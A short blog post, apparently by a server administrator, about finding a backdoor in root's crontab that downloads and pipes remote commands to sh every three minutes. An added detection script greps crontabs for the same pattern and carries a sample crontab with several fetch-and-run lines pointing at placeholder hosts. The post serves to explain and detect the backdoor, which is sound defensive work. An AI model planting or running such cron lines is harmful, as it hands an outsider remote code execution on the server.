The case of a simple server backdoor

Recently, I found that one of my servers was infected with a malicious Apache module. This is not something I am too proud of, but it happens. The original infection happened either through Plesk or through a pre-existing user. That is why I am stopping my use of Plesk control panels on the VPSes and DEs I own and manage. The upgrade process between major versions is painful and one can't expect to keep servers secure for longer periods of time.
However, the more interesting part of this story is the backdoor, which was made very simply and was in plain sight. This line was in root's crontab, and each admin thought it was something another admin used for monitoring or something else:

*/3 * * * * /usr/bin/curl --connect-timeout 5 --max-time 10 -s | sh >> /dev/null

This cron job launches 3 times per hour and downloads and executes a single command. It is very simple, but it allows downloading and executing a single command on one's server. I am still blaming myself for not noticing it earlier.
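
One way to catch entries of this shape during a crontab audit, as an added example that is not part of the original post: the function below flags cron lines that pipe a curl or wget download into an interpreter, or wrap the download in a `-c "$(...)"` command substitution. The function name, the patterns and the sample crontab (with example.invalid placeholder hosts) are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post: flag cron entries that feed a
# network download straight into an interpreter.

FETCH='(curl|wget)'
INTERP='(sh|bash|dash|ksh|zsh|python[0-9.]*|perl|php)'
END='([[:space:];>&|]|$)'
# Case 1: fetch tool ... | [path/]interpreter
PIPE_RE="(^|[^[:alnum:]_.-])${FETCH}[[:space:]].*[|][[:space:]]*([^[:space:]|]*/)?${INTERP}${END}"
# Case 2: interpreter -c "$(fetch ...)" or the backtick form
SUBST_RE="${INTERP}[[:space:]]+-c[[:space:]].*([\$][(]|\`)[^)\`]*${FETCH}[[:space:]]"

# scan_cron: crontab text on stdin -> "LINENO:entry" per suspicious entry.
scan_cron() {
    grep -nE "${PIPE_RE}|${SUBST_RE}" |
        grep -vE '^[0-9]+:[[:space:]]*#'   # drop commented-out entries
}

# Constructed sample crontab; hosts are placeholders, not indicators.
sample_crontab() {
    cat <<'EOF'
MAILTO=root
0 4 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/3 * * * * /usr/bin/curl --connect-timeout 5 --max-time 10 -s http://example.invalid/a | sh >> /dev/null
15 * * * * wget -qO- http://example.invalid/b | /bin/bash
@reboot bash -c "$(curl -fsSL http://example.invalid/c)"
30 2 * * * curl -s http://example.invalid/health | grep -q OK
# */5 * * * * curl -s http://example.invalid/old | sh
EOF
}

sample_crontab | scan_cron
```

On a live host, feed it the output of `crontab -l` for each account along with /etc/crontab and the files under /etc/cron.d. A hit is a prompt to ask who owns the entry, not proof of compromise.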


  1. Hi, I found this on my server. Did you find the downloaded files and see what it really does? I mean, I want to find malicious code on my server.
